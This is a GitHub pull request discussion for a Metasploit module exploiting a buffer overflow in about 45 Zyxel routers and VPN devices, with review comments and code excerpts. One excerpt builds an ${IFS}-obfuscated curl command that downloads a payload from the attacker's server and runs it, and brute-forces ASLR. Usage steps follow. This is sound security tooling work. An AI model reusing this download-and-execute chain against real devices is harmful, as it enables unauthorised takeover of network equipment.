-
Notifications
You must be signed in to change notification settings - Fork 14k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Unauthenticated RCE for multiple Zyxel router #17388
Conversation
documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md
Show resolved
Hide resolved
modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
Outdated
Show resolved
Hide resolved
Added the requested changes |
documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md
Show resolved
Hide resolved
documentation/modules/exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.md
Outdated
Show resolved
Hide resolved
if ((datastore['SRVHOST'] == '0.0.0.0') || (datastore['SRVHOST'] == '::')) | ||
fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST") | ||
end |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
These checks are not covering all the cases to detect if the option is really an IPv4 or IPv6 address, and if it refers to the "This host on this network" address. The following checks using the Rex::Socket
helpers are more reliable and should be used instead:
metasploit-framework/lib/msf/core/exploit/remote/jndi_injection.rb
Lines 134 to 136 in 9d866a3
if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0 | |
fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.') | |
end |
modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
Outdated
Show resolved
Hide resolved
srv_host = datastore['SRVHOST'] | ||
srv_port = datastore['SRVPORT'] | ||
@cmd_file = rand_text_alpha_lower(1) | ||
payload_file = rand_text_alpha_lower(1) | ||
|
||
# generate our payload executable | ||
@payload_exe = generate_payload_exe | ||
|
||
# Command that will download @payload_exe and execute it | ||
download_cmd = 'curl${IFS}' | ||
if datastore['SSL'] | ||
# https:// can't be a substring as the zyxel parser won't be able to understand the URI | ||
download_cmd += '-k${IFS}https:`echo${IFS}//`' | ||
end | ||
download_cmd += "#{srv_host}:#{srv_port}/#{payload_file}${IFS}-o${IFS}/tmp/#{payload_file};chmod${IFS}+x${IFS}/tmp/#{payload_file};/tmp/#{payload_file};" | ||
|
||
http_service = "#{srv_host}:#{srv_port}" | ||
print_status("Starting up our web service on #{http_service} ...") | ||
start_service({ | ||
'Uri' => { | ||
'Proc' => proc do |cli, req| | ||
on_request_uri(cli, req) | ||
end, | ||
'Path' => "/#{payload_file}" | ||
} | ||
}) | ||
|
||
print_status('Going to bruteforce ASLR, this might take a while...') | ||
|
||
count = 1 | ||
exploit_url = build_buffer_overflow_url(download_cmd) | ||
timeout = 0 | ||
until @payload_sent | ||
print_status("Trying to overflow the buffer, attempt #{count}") | ||
send_exploit(exploit_url) | ||
count += 1 | ||
timeout += 6 | ||
|
||
if timeout == datastore['MAX_WAIT'].to_i | ||
fail_with(Failure::Unknown, "#{peer} - Timeout reached! You were either very unlucky or the device is not vulnerable anymore!") | ||
end |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It looks like all of this could be replaced by a simple cmdstager
with the curl
flavor. This is the current standard and should be used as much as possible.
You can find an updated cmdstager
documentation here (still a WIP PR) or the original documentation here.
Please, let us know if you need help or if you have any questions about this.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hi, I tried to change my code up in order to use the cmdstager
. However, I can't figure out how to run the exploit multiple times (required, as it will bruteforce ASLR). My current idea would be to call execute_cmdstager
until a new session is opened. This should be possible by polling the session count.
Is there a better option?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
After looking into the logic again, I agree that the cmdstager
might be complicated to use. It might not be a good solution here. You can still call execute_cmdstager
multiple time, but if you have a big payload, it will call execute_command
multiple times for each call to execute_cmdstager
. There might be a workaround for this, but I'm not sure it is worth the effort.
modules/exploits/linux/misc/zyxel_multiple_devices_zhttp_lan_rce.rb
Outdated
Show resolved
Hide resolved
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools. We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
You can automate most of these changes with the
Please update your branch after these have been made, and reach out if you have any problems. |
Hey @shr70. I wasn't able to successfully emulate one of these devices for testing. Would you provide us with a packet capture demonstrating the exploit? If you are able to send one, be sure to remove any sensitive data from it and email msfdev[at]metasploit.com. Thank you. |
@jheysel-r7 I just sent over a sanitized pcap of a successfull exploitation |
…ce.rb Co-authored-by: Jeffrey Martin <jeffrey_martin@rapid7.com>
…s_zhttp_lan_rce.md Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
…ce.rb Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
…ce.rb Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com>
@shr70 thank you for the pcap. Everything looks great. I just pushed a couple changes to address a couple final comments and linting issues. |
Release NotesThis PR adds a new exploit module for a buffer overflow in roughly 45 different Zyxel router and VPN models. |
This request adds a new exploit module for a buffer overflow in roughly 45 different Zyxel router and VPN models.
The security advisory can be found here. A blogpost with more information has been published on the SEC Consult blog.
Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/linux/misc/zyxel_multiple_devices_zhttp_lan_rce
check
run
A video of the successfull exploitation can be found here: https://youtu.be/hbF3LEljxSA